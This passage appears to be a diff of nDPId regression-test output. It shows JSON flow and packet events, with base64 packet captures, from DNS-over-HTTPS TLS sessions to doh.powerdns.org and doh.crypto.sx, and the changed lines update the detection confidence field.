02374{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":946739380903,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1467,"pkt_l4_len":1433,"thread_ts_msec":946739380903,"pkt":"ZmZmZmZmRERERERECABFAAWtAxpAADQGNBstWhwACgAAAQG7gjqNzd+K88GI4VAYAnlzfQAACEkFkdj1Us7HE6XsQGxneQX\/pTaXJNHBzTBwjbjFH2PSLY9gxHervwko9HwLHhkgWdiRotlJENzv3dIlV0Q25g7GanzLzAoq\/bJLnF1bxRf0nf8R7xwqHIiEyWrnrfJqukts8v3m8MMBnkDAGd5xOmtynEVhFSJmjPZeWlanPH3W\/gPE9eVpcr\/bC8aD31d4wHJftv6KUYCRDzDXbCSoL\/6F7bgfENCEavhYW2LuID8zVPN+yKzb3WDD71Bfm\/QzlUMFQuZM5HbG0c7uIAOOAxkawVYPNiqL2TFCk1ynXFgmF4gXvbL\/HYrDLFRfjW4de\/NkjjSai08L+PfACua2q5oTvt2qGJPeolVEHsMmZEjEwazNhDwGqFKG5OP+F531r01cH7BTJcZ05QE7qXBrbvqwdtdoGPvG50ZEjeoenLq9i4bYfhTR7gqdrp+nT5HdXBlwZ3BA7TNBvRO28EIkDbwnbkKR1uAOgeHpmVvBpmpiphn4DYQZvVFKBDcAp0CgnjFhQ7BpU5nrco2WQPx+1Dj+wVwuk8wQg4nsuaxF9uoh5BJPTUJDd+oGcKzJnMyQnjiAungCkABFhOHccfPCI4WdjBjLMLNqgoxHw6DJHYylEKtOB9OnnXDF2J7Jvo9Dz26D1KrzmXsDWoLDC1fC96J8yd93fYvTZHskQxfY50BQIAKcBIdr8K4+MowCcaLlKXgQ2BvySvU9B5mJVdaqmTLF1fzesL+WRRK51q7IAwLh77wssc7jt76mm0H3PAWysYvmp\/NCiSKfjKaaLkm9x2NoEkekjBVCT4zJZaY12lyFWkBUvQQdolUu\/1tiRf86EnZ+MpspCpIhymi\/IUp68M\/Eb+2ljNKVmV1Er+pytZKFdhm+LxFZQDgPvwZts5tJVArrKTXEX7mbMUyNCFK87rJIQtF3h75H2QQdF8Dne8XAGsXDDnswycmS8W4DR2ei8Mvw6EchukCH49+5iX+zWw8yLNfbuXrdtwpsTWibehpgDGJwJ32GJ3PUhcT2O8ckRkT01hA4OhJ5s8FVi9G4sK5PSDUaW\/FVD5mXCOlbG6fI8ep93Cq318IKEa9gHWkRIcGP1KNeJ0vqPt6W+fiprWcAT+y38\/pHS\/DIldwWXxoakgp8kEgE10+BHsdUGoLtM0vHARs9JoXziCU\/gwCe4xJoYT7yIuKPLoyyOJzupzLZV+Yx6GthfYTU5x9FRZbuuSu\/4e+BWK3Ph42jg8FFm3MjO7iYnNl4v1+ChQKVR7XODNZWDH3jwqcZ8qhbkD9u5SI6j\/BA1C0rUPcBjh1+6XjoNgW\/MuFBBpUx0b9PcVFriOAhMdQziZ17xbnHnF7nwzD4ltsyPw098+Y62NYg0g7ZzmYgr7Bp\/OQu72rrzto9ZurPdNMKCU\/kuUSQfJNRXnpCKpphgwF89PQmt81ZhzDDg8jGUYjA+eCwP5b5c3W1mHz2rbpTYaJ5WAEPawg7kcD\/0daljt7SoSzY0j1SW+z8PqelVSwUwhQf5v+dU
BJntKDTvIA8dd3\/P5RebSAS6fwWCMpEa2Wpe0EbiTKfmmwomuAMmkjN4HlloVMdOTeEonHISxyYlgXipaeXT8CPFbuFXE4ejDU2aTkR9\/ZIbgoZdx7IXmaK+NxS9KICVTe0LPka0QmobSr15yArkyNHaP1EjswXAwMAYdZTBGnK4vcmbufHHRKWT+kPKyQO98Boq8AW86\/7q3c0DIh4T2TuGPAeaW+ueW75g7BJBBU7YuGFvnEEgi07qTSBXDL1UISZX8PwWOHA6mln36hZp5MmWU+JESIy2cQgYeQXAwMANQq+Suu4\/zFTPT1s4z\/CUiKzLUAWytPdwzfRZmXCp50PDxLOSYvzo75EbO+96Njs+ccRggY7"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":946739385090,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739385090,"pkt":"REREREREZmZmZmZmCABFAAFGrgFAAH4GLMUKAAABiJDXnsvQAbv3Oz1sep96IVAYAfYiJAAAFgMBARkBAAEVAwNZtcLiAhjzwZoFuSzepzhVh3+I+642bR2Bdc1go+HJvyB94\/ND5pNfeKEuu8RDLRRLZQtcZUnz37DmCj0UC1geOAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG9oLnBvd2VyZG5zLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBPoxVI1tXnUcUqsbORFpVub7e\/4DvFTpQM4hnCin1UEw=="} 
-00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
04676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":946739385124,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3170,"pkt_l4_len":3136,"thread_ts_msec":946739385124,"pkt":"ZmZmZmZmRERERERECABFAAxUg1ZAADcGk2KIkNeeCgAAAQG7y9B6n3oh9zs+ilAYAO0tMgAAFgMDAHoCAAB2AwNC32Ly6HNyagXW\/50d2q6qJAOmShuP86HMxipBKzBmwCB94\/ND5pNfeKEuu8RDLRRLZQtcZUnz37DmCj0UC1geOBMCAAAuACsAAgMEADMAJAAdACBiVzglBWvQOWIt\/inusfkCbeAeDbm6AiXUcYUQ0SeUdBQDAwABARcDAwAgVY3jrnTrJkAawm+Mv8gBTn6zfdywiZ3PkfSROpmIxNoXAwMKFapXpMK700YralL2NJ+2AqPfCUAacni3qdcZUnufsXl31+F2NSHowZS8bEZc4wYIOhESfjBH81NgZUBCJL0cGqDMG7c\/GafBLHylsDncbVfIqhYnumIxgnBjMekzN4Jr3Pc5g1dWYk4XIPvLeMa1AeLFQqOY+unh1DHuo4FV4KfjYjnh7ERuvhffEbloWyMHFdAQi8p2J65FwIVJHxtFX6hmaEMmHATlFHHOx1RIGQmbmA5r5k0vgPGiuUMBe1e8Ay6+kNyhTTutV32hMuU4\/4gl06pCrT6iDU4Fx4eNT+Bo6E12QIKo042tC7Wn8Kl\/KILiC4TaY1uTO0+LE4wVqs5DJHWwykde\/Mpu9moeLZ0VhV6Rnx2ocHW4rczn9gPX5qTiTrDgHO7CKCVp0Yo86Aw2suyeRkNR6Pz2DTuex3RC6JD+6hKlKYjQfx6kO1r8jKEZ8UZCGU+Rw2Pd2IT\/whiiT5Kf7zLPm28Fu5xYAFYob+TbRXBcQ0z8XUJIWzCMQvkjyj\/EBbyfhm8Iz194guweTL19Y3Q2XO+NnAUm9ihjSHpRimJ0Ale\/24shK7Q0gI7NtX4Sy93vR61pN+Zbul9p4+Mos8cFPIfYJPR5DmxNv9L\/cWnYOwtiE8KnRSAYR+6q3d\/0S6rIgkskZa1GGNAffeDtgnD5SVrh+YhdzCWZCb6834ULGghfWcw8DVqJTSeWttzs5JvcUzLfaxv2WQHaWCXuUpmCZy6HgKkW3jxYYWr2tyqizXXXq732dtVhz4LWmL9EHS1WzONzEhrNFQDtpAQ95k9MRPEdXjg0bNse0lpUI4AUqhIkxWgs0j+8YRzV3BBFFrpEwA3Ylhpo+Wbg8IG0hFyThCaHTvj0vN5WKh94GQCSIjO11AtJoS9k0tl5NWJ7dp2n0NCYI25hp41FivaF\/BBZqFxHTd\/4w8k1KmIQOky6ICw7WRykbaqxzUboD5Bq7peIuOsiwZoUMD+BDbF\/3fE\/CVHWoaOcr09A0PaL0PLhUDjARYyrR4LsVfpqkH4CZh+5Jr1aOIJ+zgcH7Gme4o7fpj5Ml+hu\/y+kOOZZN5J0XdtmvZE5w20Osrk+W9YsiLIeYNt9SB2i7LEsIRfsOrVhh9XsJ8\/VF+0Pp0BTxOsC+9Ft0\/Qj6hgm17CCVsOwdD0VhkUWaus1O+o2PGnC8v4FL3kFyyqT6BtubEcffH1AbvnEid+VZXXjMTJvMB6eWAs+UqpOrNnkCEZAK35TZ0tRUT\/0MJ65M3rSS8cnt+LL4apIWh9CenPODN3
5ZvH8b3XA1lwJHej3o7w4KZBEvRoLt8OxNNvwpgMfHbFpXZIqbODt95v1PnTJxwC\/vTEturbRIFjRNgt+KCX3zfwvULi6DBxiqBmChwECudELdgYVXSzaQF56hOrspt7m7cSP\/bSuhLgvGoeM7hRIXBgEFXWWobiqWKLPkIiUnd3zKygePoMYOZHF1u2D1V4jxKHpRJ6c0k9v9f8PV1\/2cqY\/66gHBBbRV41oC7rjWm5aIoPFQPYH0PovphDScGBnJ6jwAMRZhEh8stnUD5D9slPJ\/emP0c\/PTpb6PEHZyu0Q7qMTKM1bbEpBCcvYFzyVsCvmHuicyOKAs3xMxmCmWm4Eqf7griGXbNKYrhS8laSwuwkSEnXVtwhIr1b+a3aGOTQNdzJzZMKbJeIH1FS5VDDqACuwzlpn2\/PpEcmP5h\/q7H0tPqDs+gUGEHDMancSkknkDjnO8AWIHrv7XSmAw8MzBpM2IwCdCuY2dZXBowy6lZV\/inUY7ZvvXtbP6a8QnD\/\/IUygRpu63NQLm4VeKCFEprpn1cgwz5cL4vjrW8z1Oy+wINHvxXqkotg8FbTmtoSQdi7m2\/uaxkwXGvCE+Ey\/VyskJtt+1lkVPt6gqRb1ZVRQm9DD0JoMxHNgFOAaDrB+WFlvX4dGQvQzwATgRC8IKAuMZ8oKSe0p8HpA+6MvWjcmzVE8kVy6HlIQ+H75lU+B2jVUeDC7BKjayT8YnFAN9VHJiYBcwsc6cBByDnSSlpjY95o1fVD\/OvMoqArUx2Avc07VIGr\/MqkoiuFsBZpt7HMy13Sks4rLBRM4blbz1tgnQW4V9XKGhwXXv\/r\/C7JzoFDKo1O5LL2d9NrS47Pk6pIUPyJaZQjYfdcqsgSPEYWloR+Ff71Pv2pzjT7Sxhw7YViV\/havSqMuVAeVNrx2FMlZ7\/Bjxt5t67OkjvVTbouDt\/zCvvPnjRGuWwfp0n7UEFUPBk0VQxxGTP46k14fFISL3DGCnaRmvSrBlk9oDA6joQ7sLe2wbd3yp\/7JTFG1yDws5hd9oSrDxTaFhT45Qw3wjaIXqpHrDVkIJVV3fSH3u051VvqUmuXNvgcA8QfJRF+xOWpwuJtANd+GaqvaC+iETLzkP5VxYMxDGAjzMI0o+7huhk06Ls+Jf4doAnMQ5xvzlXN0Jrm+66K6cwpPwq24uT0WBbVDSG8a63HdMk9Pitugm8gT5TfsMmkXcm8XvYm1EpxDTSUVXFdXoLfWyXIhhuACKArB7XcNbTOuzKmBQBNDeLFYB1E9Xt4xRs2cOc5M8BTSXsHSPQTYdc21dTZiVfSAP6\/2Gshg6m4bugupSvk5LVq6A3lh9ffmzYt3Db3zvnfSy\/Tt0BCYi48I1IzHC+nCbjFn40UDUHc5XrNCkmhQS1xNJg2qHFTjjUPePEW4+j3bBQRUYXBtmXyjbe7imkVYxn1jKZ8UW4USSgX9QTTgWMboFPNKvAGle0s4p63tKesbx5ZYZnXD1JMoq2wiuX3opjO2N0ancv\/RxoLDDssEhCe9dO3easTHhI9ARvh9rKZYKF6v6Kl1ISp1JmJSDWM7inua1o+4o1SDMyo05cBVGhhMTS\/9p3uBa3Q1+zink\/HkPt7+J8Qdeq8lFck+4f63IssnVRJTPYYtIlJvBDnEIzxlrIFjJvmSNN4lcsRZJPOIHxFfXw8TJRTgsvPxtdi3tSQFm4F+2sukCmWqPEy6giI87MQfoD2C\/Yj2M+9KXDCNq9W6tv2b4CTjfHZU+XTLbVYONSXTzAYgn5lkwz08bD2gqCs44qF\/KSJheO2v6XSQicbKpwE887mn21\/pZ1Aw7fFPdQKOSr+ozmKo3Hb7k8xRc9xS+jbMArySJEwlivY0HatI+S+fkF+iQUSFVepgBMwShL52IjMRPaDyXtnlg9nE04NDcI9V\/O40c8DJA21O6zuYXUndYIEnkJP\/UZOqiU4vEYGHHSxvu9z+
OTP3HTmjMdAhSyUL1oGolZq+yT9EbInHY55rq655Oq72NwpUp+JpPgCJKsED+NjtqOZ3sxznqDpY1ghAohk4yNRdPDZzbaGgQemzPXCmXrFUsJTwcXd\/xU2NomnNTP3pmszYNUkgCR3tnkTvld9wZ\/IPs3fkgYPdntgi8PuMGjCH6ME+NhxjtV2MwDTodlIXAwMBGU0t8RnrdJi\/j1+SnvZYpC3oLybUZ0YAwC7FNMEEzD3PWZ1mQcdYkqPO6V4n6ARpcK+AxFYr2ZmYp5VZ6aP4ufUuA8CpPBGwUlNcZ3M2nwocOtccZ2oJCl6+gngVMfWFCnvPyKdJAIVEiwSYCs+M06T9K8Dn7IVtMoEfwHeIvTYluO2bnPQHkZLgVvtx4CODgchK9krbewpUgSyVMOqarNN5yC6WFzhdNiofu8YhqHlXXyYNaQehlZN2BSM6BAq9rstGdYvwLr32NuZBk40ppHqXSd1NL8zbf+k8yuXVg+g2tFIIoJcrHKG\/jMtPDHaZoxXSW0XP9QnmktFPm2sVrC8auYwtvIIcyHfmG4LUFWv9oOl2RWB0AiDdFwMDAEX95TGyYknbRQv3FxTdx\/ySOpsXyo9B3C1mQe9wKL+RuBQiooWFUmPWbB6tbYWNx9OjEFACLxCx4a2G5wYexWMh\/ScbEd4="} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385090,"flow_last_seen":946739385124,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3402,"flow_avg_l4_payload_len":1701,"midstream":1,"thread_ts_msec":946739385124,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385090,"flow_last_seen":946739385124,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3402,"flow_avg_l4_payload_len":1701,"midstream":1,"thread_ts_msec":946739385124,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":946739385126,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739385126,"pkt":"REREREREZmZmZmZmCABFAAB4rgNAAH4GLZEKAAABiJDXnsvQAbv3Oz6Kep+GTVAYAfUhVgAAFAMDAAEBFwMDAEXEY3mnjR52mKqLxIMUmRZZcXFLr4uTi7u4xG7UfhN8KpUlgxkvImJLngXBZJdhlsdOO80qBVROy\/zQG1hjQj9e57h2KPE="} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":946739385216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739385216,"pkt":"REREREREZmZmZmZmCABFAAFDj7xAAH4GQrYKAAABaBwAapkuAbuxqh8KTGGTY1AYAfYqeAAAFgMBARYBAAESAwMGpOiD7bGSBZJpQPwx8jjTz98dXRQiG2dJooZruAvSbiD6XuSv8nbXMIfp9OgUL1wdFi5SuPi3kly1rdyONGuyoAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLmNyeXB0by5zeAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACCocx\/g1t9BSq0aHoBq6EokYegQUNndj200eG6GOsFbfA=="} 
-00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
02429{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":946739385246,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739385246,"pkt":"ZmZmZmZmRERERERECABFAAXU\/OxAADcGF\/VoHABqCgAAAQG7mS5MYZNjsaogJVAQAEIzqQAAFgMDAHoCAAB2AwOeWrg8chGRKGTlO6HJ1p62TG+C+NnG3SsfyKZ3JDWszSD6XuSv8nbXMIfp9OgUL1wdFi5SuPi3kly1rdyONGuyoBMBAAAuADMAJAAdACBCHrrBrdBjTxY914LUzlqx\/FQ6u0oPg+tIKo8Yp0xoIwArAAIDBBQDAwABARcDAwk65sXHo5FyUtAiAM03V5kAW3+LXGLR2yplHW327Ar7lBVn+cWyqRXyVDveXS6Tg0vk7DEhWyy4Lki1hEqLM5o32Zp445RQDsbrctFBNFcOMJmryYHv6cTI1ALBX4o3m7ShqxgiNr648SOfRyoVsKr13ok5Co8m3yWWjvTT7U22a\/V25Yf1TTU5ZX3C3nLhUlp8F4S6K70cvraldnw\/uD6FRUq1lAFYY+RdFtBona62R3kW3zAEmLHlxjwypAF3Ed8HpEUN3N6Hh8WR8FPduTTrU1rGJcfthDCSePngGTmyI7kai\/r2bxnw0X75rGWPasNSz\/szhNdRWEo0KOZIuIIBBW21rDG1KEO\/5TMjvtncyk4jgN5jajgEgs3G7B7IN47mqI9K2FWa09ZHw5D9ghGF6WusPDND4+h9gRzFYMTRQAs+YDOQfRoqmeDcHvQas+1JnEYjeG1g+nCoph2J1xKskq4pSu\/4\/GnANXkQNNVNHjjq8pJ5wm6ibeZE1gq6PVr0nZRMBq7E5\/av8PC0+acRxKixaAa33wWyU6SeZcL1kZkunKDWXWcdvdQy51Xenyz43fec7O\/+7mHHRsySVytdXjgD0ZKChXJn+AmwQrC7OY5cEE84MSyXQywUeiGMZz6HP3Gxw+6pQWrQZTjvM2lPibOGlOclGV30N96QQ95Wm7tUJbwgXYzy1Ap3e6BhUMIyFcI9\/pMzhGjOExmlzyT6BDYONbNyjHW2odTpZ8WjTWXt5ItMp4Qf4ciPCegZXwYLxQYwEVRpcpQCUbjq9DqojYcETIPE8pYwv+pEogBkJ36XO7ISaByslei0uwlMTDGqahxFUG9xNqF2N+uBuGm3rP1N0De6EH72L31wAMHQLr+g\/Z6vH8L0t5ZBiVyHRYWFiBaqBS7sS5CL7XIwxWU5nT4+O0vg9\/RKsE8R\/V3oTcaEyuOxZPN2ld4OexQ1VlWcqVQyk2Twbmq7OKKuOtMkJEEelQzBbVDHxrvHpN4rIHzn\/9TLkc3K+Gw0IKsO0YEfzDLQOy1LPBOrUtSvkHpTT\/9tKCeQ5oeaxAcdxjrW8Ob6O3OfTjPur4i7Dr1vbtCqdprUT3YFFMRDZ26nuYQwhC4uKvrLCR3YBND9okLFnTd\/lUt6yGc2upOIbcXBXCyaL3ONPVCFw2rLhSE+P67Rrx0pQ\/PN3BUeVHTUY5OZL2UVofmKcp3kyCsJpqyPvgqtN6sEvjlAvawn31gSxqPJMO+J4TEIN4NsQHeQPoQbqZEwJ5dggsoNl6xy1PlfH8FxBn\/\/\/Lr2eBnvYK65olzMCuvQ8qYuGMLDeKU+eAivsl062ELu
v+\/dM8uhg7Eno5vDfDKFHEJLzWRw5E8iFnEoRLS95ap\/irULTPgAA0QmZ5jn1YuEDktj\/0IeFc53AUQ0iqNqf8q3TqQngAAZUKBI7Sk44RP395w1L0Eyzfl4IxdNlReV035GNhrN\/DGIe5cd9OmCUDwyYWDZ5z1ksNzw8W+uzpiwBt55f0ZJkvLbFgiMA+gkUt4hT8f5WK5dSjcjsu1hL60eqoQvBa0lWD42dAL0xAVrNk06unSiy5OJX2WBK7Q7No9ybhYFoGzDI8ZzAHGp1Xz2h+but\/3A\/uToYXT+zhFlUes\/MlMz6r15CtQUfWQhXV2DbcqYzcNr7XtwvhWwQRBQjoyEwldiUNrV4kfA5BNVrLK+IAb34EZEEXlsaVEYZdfTSkwf5mFzUW8YEGENVFtWYgvqKiwzQRm4Hnu9"} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385216,"flow_last_seen":946739385246,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1735,"flow_avg_l4_payload_len":867,"midstream":1,"thread_ts_msec":946739385246,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385216,"flow_last_seen":946739385246,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1735,"flow_avg_l4_payload_len":867,"midstream":1,"thread_ts_msec":946739385246,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
